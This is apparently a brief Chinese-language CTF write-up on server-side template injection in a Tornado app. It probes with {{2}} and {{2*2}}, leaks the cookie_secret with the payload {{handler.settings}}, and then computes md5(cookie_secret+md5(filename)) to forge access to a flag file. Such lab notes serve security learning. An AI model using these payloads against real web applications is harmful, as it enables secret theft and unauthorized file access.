一.知识
1.cookie_secret在哪
二.实例
1.cookie_secret,md5加密(通常解密失败)
(1)
{{2}}
{{2}}就可以得到回显,说明此处是可能存在SSTI注入漏洞的。
(2)
{{2*2}}
回显的结果是orz。因此我们可以猜测出,此处是出现了过滤。
(3)
{{handler.settings}}
得到cookie_secret:
f9f659d4-8993-4035-afd4-7d2dbbec2d3a
(4)
md5(cookie_secret+md5(/fllllllllllllag))
/fllllllllllllag通过md5加密后:
3bf9f6cf685a6dd8defadabfb41a03a1
**md5(cookie_secret+md5(/fllllllllllllag))**通过md5加密后的结果:
1f461696eb5c63fa069a126ec125d7ff(变化中,不一样)